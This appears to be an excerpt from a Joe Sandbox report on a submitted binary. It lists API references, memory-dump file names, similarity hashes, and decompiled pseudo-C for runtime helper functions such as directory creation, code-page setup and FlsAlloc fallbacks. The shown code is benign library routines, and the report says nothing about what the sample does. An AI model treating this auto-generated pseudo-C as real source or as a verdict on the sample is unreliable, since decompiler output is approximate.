0x00ba9eb0
0x00000000
0x00000000
0x00000000
0x00000000
0x00ba9eb2
0x00ba9eb2
0x00ba9eb4
0x00ba9eb8
0x00ba9eba
0x00ba9eba
0x00ba9ece
0x00ba9ed7
0x00ba9ed9
0x00ba9edb
0x00ba9edf
0x00000000
0x00000000
0x00ba9ee1
0x00ba9ee5
0x00000000
0x00000000
0x00000000
0x00ba9ee7
0x00000000
0x00ba9f2d
0x00ba9f2d
0x00ba9f42
0x00ba9f4b
0x00ba9f53
0x00ba9f5c
0x00ba9f61
0x00ba9f69
0x00ba9f69
0x00ba9e97
0x00000000

APIs

GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,00BACBD4,00000001,?,?,?,00000000,00BB4E3D,?,?,?), ref: 00BA9E8C
WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00BB4E3D,?,?,?,?,?,00BB48E2,?), ref: 00BA9ECE
WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,00BACBD4,00000001,?,?), ref: 00BA9EF8

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 64e08de52773a342bcffa55d7f6096dfdabfb38ee15660d77027f814f11469f4
Instruction ID: 15a90ab5f72373ca52a04d8b6a0768b3f54b0dcdd1c782586bc90a6026ca1a74
Opcode Fuzzy Hash: 64e08de52773a342bcffa55d7f6096dfdabfb38ee15660d77027f814f11469f4
Instruction Fuzzy Hash: 0331F27120C3069FDF14CF24D94876ABBE8EB52710F044599F845DB292DB71EC09DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00BAA147 Relevance: 4.6, APIs: 3, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BAA147(void* __ecx, void* __eflags, WCHAR* _a4, char _a8, intOrPtr _a12) {
				short _v4100;
				signed int _t8;
				long _t10;
				void* _t11;
				int _t18;
				WCHAR* _t21;

				E00BBE1C0();
				_t21 = _a4;
				_t8 =  *(E00BABBA9(__eflags, _t21)) & 0x0000ffff;
				if(_t8 == 0x2e || _t8 == 0x20) {
					L3:
					if(E00BAA0C0(_t21) != 0 || E00BAB5AC(_t21,  &_v4100, 0x800) == 0 || CreateDirectoryW( &_v4100, 0) == 0) {
						_t10 = GetLastError();
						__eflags = _t10 - 2;
						if(_t10 == 2) {
							L12:
							_t11 = 2;
						} else {
							__eflags = _t10 - 3;
							if(_t10 == 3) {
								goto L12;
							} else {
								_t11 = 1;
							}
						}
					} else {
						goto L6;
					}
				} else {
					_t18 = CreateDirectoryW(_t21, 0); // executed
					if(_t18 != 0) {
						L6:
						if(_a8 != 0) {
							E00BAA384(_t21, _a12); // executed
						}
						_t11 = 0;
					} else {
						goto L3;
					}
				}
				return _t11;
			}

0x00baa14f
0x00baa155
0x00baa15e
0x00baa164
0x00baa178
0x00baa180
0x00baa1be
0x00baa1c4
0x00baa1c7
0x00baa1d3
0x00baa1d5
0x00baa1c9
0x00baa1c9
0x00baa1cc
0x00000000
0x00baa1ce
0x00baa1d0
0x00baa1d0
0x00baa1cc
0x00000000
0x00000000
0x00000000
0x00baa16b
0x00baa16e
0x00baa176
0x00baa1ab
0x00baa1af
0x00baa1b5
0x00baa1b5
0x00baa1ba
0x00000000
0x00000000
0x00000000
0x00baa176
0x00baa1da

APIs

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00BAA053,?,00000001,00000000,?,?), ref: 00BAA16E
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00BAA053,?,00000001,00000000,?,?), ref: 00BAA1A1
GetLastError.KERNEL32(?,?,?,?,00BAA053,?,00000001,00000000,?,?), ref: 00BAA1BE

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: CreateDirectory$ErrorLast
String ID:
API String ID: 2485089472-0
Opcode ID: ae17b8bd045e633dabe19a080479566b0ed2d239ed39e78bfc8f20133ef78275
Instruction ID: 4d5c41732adea19571cc8ecdd7578a4f302b027a7245c8a581a596974377fb9a
Opcode Fuzzy Hash: ae17b8bd045e633dabe19a080479566b0ed2d239ed39e78bfc8f20133ef78275
Instruction Fuzzy Hash: AB019E3115825476EB22AB644C45BFA73D8EF1B781F0444D2F901F6091EB649981D6B3

Uniqueness

Uniqueness Score: -1.00%

Function 00BAC767 Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00BAC767(intOrPtr __ecx, void* __edx, void* __eflags) {
				void* __esi;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t29;
				void* _t39;
				intOrPtr _t41;
				intOrPtr _t44;
				void* _t46;
				void* _t49;

				_t49 = __eflags;
				_t39 = __edx;
				_t29 = __ecx;
				E00BBE0E4(E00BD1D50, _t46);
				_push(_t29);
				_push(_t29);
				_t44 = _t29;
				 *((intOrPtr*)(_t46 - 0x10)) = _t44;
				E00BAA771(_t44 + 0x90);
				_t41 = 0;
				 *((intOrPtr*)(_t46 - 4)) = 0;
				E00BAA771(_t44 + 0xa4);
				 *((char*)(_t46 - 4)) = 1;
				E00BAA771(_t44 + 0xb8);
				 *((char*)(_t46 - 4)) = 2;
				_t21 = E00BBE0A0(_t39, _t44, _t49, 0x10c0);
				 *((intOrPtr*)(_t46 - 0x14)) = _t21;
				 *((char*)(_t46 - 4)) = 3;
				_t50 = _t21;
				if(_t21 == 0) {
					_t22 = 0;
				} else {
					_t22 = E00BA6027(_t21, _t39, _t50);
				}
				 *((char*)(_t46 - 4)) = 2;
				 *((intOrPtr*)(_t44 + 0x40)) = _t22;
				_t23 = E00BBE0A0(_t39, _t44, _t50, 0x10c0); // executed
				 *((intOrPtr*)(_t46 - 0x14)) = _t23;
				 *((char*)(_t46 - 4)) = 4;
				if(_t23 != 0) {
					_t41 = _t23;
				}
				 *((intOrPtr*)(_t44 + 0x44)) = _t41;
				E00BAC866(_t23, _t44);
				 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0xc));
				return _t44;
			}

0x00bac767
0x00bac767
0x00bac767
0x00bac76c
0x00bac771
0x00bac772
0x00bac775
0x00bac778
0x00bac781
0x00bac786
0x00bac78e
0x00bac791
0x00bac79c
0x00bac7a0
0x00bac7aa
0x00bac7af
0x00bac7b5
0x00bac7b8
0x00bac7bc
0x00bac7be
0x00bac7c9
0x00bac7c0
0x00bac7c2
0x00bac7c2
0x00bac7cc
0x00bac7d0
0x00bac7d3
0x00bac7d9
0x00bac7dc
0x00bac7e2
0x00bac7eb
0x00bac7eb
0x00bac7ef
0x00bac7f2
0x00bac7ff
0x00bac809

APIs

__EH_prolog.LIBCMT ref: 00BAC76C
new.LIBCMT ref: 00BAC7AF
new.LIBCMT ref: 00BAC7D3

Part of subcall function 00BA6027: __EH_prolog.LIBCMT ref: 00BA602C

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 2b235aee424dbd9303409c9a8c73de5af260d83ad2ac8f462295e6a7c9f6884d
Instruction ID: d97867a985a34078ee865eb1e84884a2e41c610d510a393d0ae9c06541249dcd
Opcode Fuzzy Hash: 2b235aee424dbd9303409c9a8c73de5af260d83ad2ac8f462295e6a7c9f6884d
Instruction Fuzzy Hash: 3D11A3B5A082449BDB25EBB895467BEBBE4DF45300F1404EEE446D3252EFB45E00C762

Uniqueness

Uniqueness Score: -1.00%

Function 00BBAA7E Relevance: 4.5, APIs: 3, Instructions: 47COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 00BBAA88
SHGetFolderLocation.SHELL32(00000000,?,00000000,00000000,?), ref: 00BBAA9A
SHGetPathFromIDListW.SHELL32(?,?), ref: 00BBAAB2

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: FolderFromListLocationMallocPath
String ID:
API String ID: 1884932940-0
Opcode ID: bd1c009530f725098a6967c623145e8ae62bf1a7e4a60450332a7d708ea24da0
Instruction ID: b6b8a73c3732be962c09b7c57ee1ca8c079d9aa3c69065d1d7abe576c4da7adc
Opcode Fuzzy Hash: bd1c009530f725098a6967c623145e8ae62bf1a7e4a60450332a7d708ea24da0
Instruction Fuzzy Hash: D9014B7A644018FFCF019FA4DC49DEEBBADEB09350B044196F946C7220DA31AA54EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BCAE73 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00BCAE73(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed int _v1828;
				signed int _t63;
				void* _t67;
				signed int _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t86;
				char _t87;
				char _t90;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				void* _t96;
				char* _t97;
				intOrPtr _t101;
				signed int _t102;

				_t95 = __edx;
				_t63 =  *0xbdd668; // 0xb57946a0
				_v8 = _t63 ^ _t102;
				_t101 = _a4;
				_t4 = _t101 + 4; // 0x5efc4d8b
				if(GetCPInfo( *_t4,  &_v1820) == 0) {
					_t47 = _t101 + 0x119; // 0xbcb4c6
					_t96 = _t47;
					_t90 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t96;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t97 = _t96 + _t90;
						_t69 = _t68 + _t97;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t97 = 0;
							} else {
								_t72 = _t101 + _t90;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t90 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t101 + _t90 + 0x19) =  *(_t101 + _t90 + 0x19) | 0x00000010;
							_t54 = _t90 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t97 = _t73;
						}
						_t68 = _v1828;
						_t61 = _t101 + 0x119; // 0xbcb4c6
						_t96 = _t61;
						_t90 = _t90 + 1;
						__eflags = _t90 - 0x100;
					} while (_t90 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t102 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t93 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t108 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t95 =  *(_t93 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t95;
							if(_t76 > _t95) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t102 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t93 = _t93 + 2;
						__eflags = _t93;
						_t75 =  *_t93;
					}
					_t13 = _t101 + 4; // 0x5efc4d8b
					E00BCBF68(0, _t95, 0x100, _t101, _t108, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
					_t16 = _t101 + 4; // 0x5efc4d8b
					_t19 = _t101 + 0x21c; // 0xdb855708
					E00BCA0F5(0x100, _t101, _t108, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0); // executed
					_t21 = _t101 + 4; // 0x5efc4d8b
					_t23 = _t101 + 0x21c; // 0xdb855708
					E00BCA0F5(0x100, _t101, _t108, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
					_t94 = 0;
					do {
						_t86 =  *(_t102 + _t94 * 2 - 0x704) & 0x0000ffff;
						if((_t86 & 0x00000001) == 0) {
							__eflags = _t86 & 0x00000002;
							if((_t86 & 0x00000002) == 0) {
								 *((char*)(_t101 + _t94 + 0x119)) = 0;
							} else {
								_t37 = _t101 + _t94 + 0x19;
								 *_t37 =  *(_t101 + _t94 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x304));
								goto L15;
							}
						} else {
							 *(_t101 + _t94 + 0x19) =  *(_t101 + _t94 + 0x19) | 0x00000010;
							_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x204));
							L15:
							 *((char*)(_t101 + _t94 + 0x119)) = _t87;
						}
						_t94 = _t94 + 1;
					} while (_t94 < 0x100);
				}
				return E00BBEA8A(_v8 ^ _t102);
			}

0x00bcae73
0x00bcae7e
0x00bcae85
0x00bcae8a
0x00bcae95
0x00bcaea7
0x00bcaf9f
0x00bcaf9f
0x00bcafa5
0x00bcafa7
0x00bcafa8
0x00bcafa8
0x00bcafaa
0x00bcafb0
0x00bcafb0
0x00bcafb2
0x00bcafb4
0x00bcafbd
0x00bcafc0
0x00bcafcc
0x00bcafd3
0x00bcafe3
0x00bcafd5
0x00bcafd5
0x00bcafd8
0x00bcafd8
0x00bcafd8
0x00bcafdc
0x00bcafdc
0x00000000
0x00bcafdc
0x00bcafc2
0x00bcafc2
0x00bcafc7
0x00bcafc7
0x00bcafdf
0x00bcafdf
0x00bcafdf
0x00bcafe5
0x00bcafeb
0x00bcafeb
0x00bcaff1
0x00bcaff2
0x00bcaff2
0x00bcaead
0x00bcaead
0x00bcaeaf
0x00bcaeaf
0x00bcaeb6
0x00bcaeb7
0x00bcaebb
0x00bcaec1
0x00bcaec7
0x00bcaeef
0x00bcaeef
0x00bcaef1
0x00000000
0x00000000
0x00bcaed0
0x00bcaed4
0x00bcaee6
0x00bcaee6
0x00bcaee8
0x00000000
0x00000000
0x00bcaed9
0x00bcaedb
0x00bcaedd
0x00bcaee5
0x00bcaee5
0x00000000
0x00bcaee5
0x00000000
0x00bcaedb
0x00bcaeea
0x00bcaeea
0x00bcaeed
0x00bcaeed
0x00bcaef4
0x00bcaf09
0x00bcaf0f
0x00bcaf23
0x00bcaf2a
0x00bcaf39
0x00bcaf4b
0x00bcaf52
0x00bcaf5a
0x00bcaf5c
0x00bcaf5c
0x00bcaf66
0x00bcaf76
0x00bcaf78
0x00bcaf8f
0x00bcaf7a
0x00bcaf7a
0x00bcaf7a
0x00bcaf7a
0x00bcaf7f
0x00000000
0x00bcaf7f
0x00bcaf68
0x00bcaf68
0x00bcaf6d
0x00bcaf86
0x00bcaf86
0x00bcaf86
0x00bcaf96
0x00bcaf97
0x00bcaf9b
0x00bcb006

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00BCAE98

Strings

, xrefs: 00BCAEDD

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: f37bce520c8812ad50f390b6d6faf1a736685bb2e9cd7e4098acc720017e9bfd
Instruction ID: bfbbd126785ce74ae23df96e50e75db6a3d3a9c5b145ff50af0ea8d0c7a46008
Opcode Fuzzy Hash: f37bce520c8812ad50f390b6d6faf1a736685bb2e9cd7e4098acc720017e9bfd
Instruction Fuzzy Hash: AC4128B050428C9EDB228F64CC94FFABBF9DB45308F2444EDE59AC7142E235AA45DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00BCA5AC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 30%

			E00BCA5AC(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _t18;
				intOrPtr* _t20;
				intOrPtr* _t31;
				signed int _t33;

				_t26 = __ecx;
				_push(__ecx);
				_t18 =  *0xbdd668; // 0xb57946a0
				_v8 = _t18 ^ _t33;
				_push(__esi);
				_t20 = E00BCA2D8(0x16, "LCMapStringEx", 0xbd6354, "LCMapStringEx"); // executed
				_t31 = _t20;
				if(_t31 == 0) {
					LCMapStringW(E00BCA634(_t26, _t31, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0xbd2260(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					 *_t31();
				}
				return E00BBEA8A(_v8 ^ _t33);
			}

0x00bca5ac
0x00bca5b1
0x00bca5b2
0x00bca5b9
0x00bca5bc
0x00bca5ce
0x00bca5d3
0x00bca5da
0x00bca61d
0x00bca5dc
0x00bca5f9
0x00bca5ff
0x00bca5ff
0x00bca631

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,7FE85006,00000001,?,000000FF), ref: 00BCA61D

Strings

LCMapStringEx, xrefs: 00BCA5BD, 00BCA5C7

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 932474e283274449c5304037c1498672a36787ab53bad2192a533856bb0b778a
Instruction ID: ce4a1a05a39b78a80a7b0d2bfd2e1eb4e03193e044e0d1b019f46364909f79e5
Opcode Fuzzy Hash: 932474e283274449c5304037c1498672a36787ab53bad2192a533856bb0b778a
Instruction Fuzzy Hash: A201D33254120DBBCF026F94DC15EEEBFA6EB08764F044199FE1426161DA728931EB95

Uniqueness

Uniqueness Score: -1.00%

Function 00BCA54A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E00BCA54A(void* __ecx, void* __esi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _t8;
				intOrPtr* _t10;
				intOrPtr* _t20;
				signed int _t22;

				_push(__ecx);
				_t8 =  *0xbdd668; // 0xb57946a0
				_v8 = _t8 ^ _t22;
				_t10 = E00BCA2D8(0x14, "InitializeCriticalSectionEx", 0xbd634c, 0xbd6354); // executed
				_t20 = _t10;
				if(_t20 == 0) {
					InitializeCriticalSectionAndSpinCount(_a4, _a8);
				} else {
					 *0xbd2260(_a4, _a8, _a12);
					 *_t20();
				}
				return E00BBEA8A(_v8 ^ _t22);
			}

0x00bca54f
0x00bca550
0x00bca557
0x00bca56c
0x00bca571
0x00bca578
0x00bca595
0x00bca57a
0x00bca585
0x00bca58b
0x00bca58b
0x00bca5a9

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00BC9BAF), ref: 00BCA595

Strings

InitializeCriticalSectionEx, xrefs: 00BCA565

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: f2035981521b2b2c1409f09ee0e0d26b02c8be235345dec5a4deab3f3f075617
Instruction ID: 9f5968136305eb0c369e24fe881de73ab9c5c3cd3a42cd73f245f839944455ef
Opcode Fuzzy Hash: f2035981521b2b2c1409f09ee0e0d26b02c8be235345dec5a4deab3f3f075617
Instruction Fuzzy Hash: 40F0B43164121CBBCB016F54CC15DAEFFE1EB19720B01819AFD091B260EA728A11EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00BCA3EF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30
memoryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00BCA3EF(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _t4;
				intOrPtr* _t6;
				intOrPtr* _t16;
				signed int _t18;

				_push(__ecx);
				_t4 =  *0xbdd668; // 0xb57946a0
				_v8 = _t4 ^ _t18;
				_t6 = E00BCA2D8(3, "FlsAlloc", 0xbd6310, 0xbd6318); // executed
				_t16 = _t6;
				if(_t16 == 0) {
					TlsAlloc();
				} else {
					 *0xbd2260(_a4);
					 *_t16();
				}
				return E00BBEA8A(_v8 ^ _t18);
			}

0x00bca3f4
0x00bca3f5
0x00bca3fc
0x00bca411
0x00bca416
0x00bca41d
0x00bca42e
0x00bca41f
0x00bca424
0x00bca42a
0x00bca42a
0x00bca442

APIs

TlsAlloc.KERNEL32 ref: 00BCA42E

Strings

FlsAlloc, xrefs: 00BCA40A

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: a6e2c6039d683045cfc0b40958e8f17dd19ce47b2f2646a43c0e40af309b53d0
Instruction ID: 51e0627fa44e1154cbcf0e88c272637e560fbb17977f368c3accb5e19595d6d7
Opcode Fuzzy Hash: a6e2c6039d683045cfc0b40958e8f17dd19ce47b2f2646a43c0e40af309b53d0
Instruction Fuzzy Hash: 1EE0E531A4221CAB82046B649C16EAEFBD4DB56721B4041DAFC0567351EEB54E0097DA

Uniqueness

Uniqueness Score: -1.00%

Function 00BC30D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00BC30D7(void* __eflags, intOrPtr _a4) {
				intOrPtr* _t2;
				intOrPtr* _t6;

				_t2 = E00BC2FB6(4, "FlsAlloc", 0xbd4664, "FlsAlloc"); // executed
				_t6 = _t2;
				if(_t6 == 0) {
					return TlsAlloc();
				}
				L00BBEB4C();
				return  *_t6(_a4);
			}

0x00bc30ec
0x00bc30f1
0x00bc30f8
0x00bc310b
0x00bc310b
0x00bc30ff
0x00bc3108

APIs

try_get_function.LIBVCRUNTIME ref: 00BC30EC

Strings

FlsAlloc, xrefs: 00BC30DB, 00BC30E5

Memory Dump Source

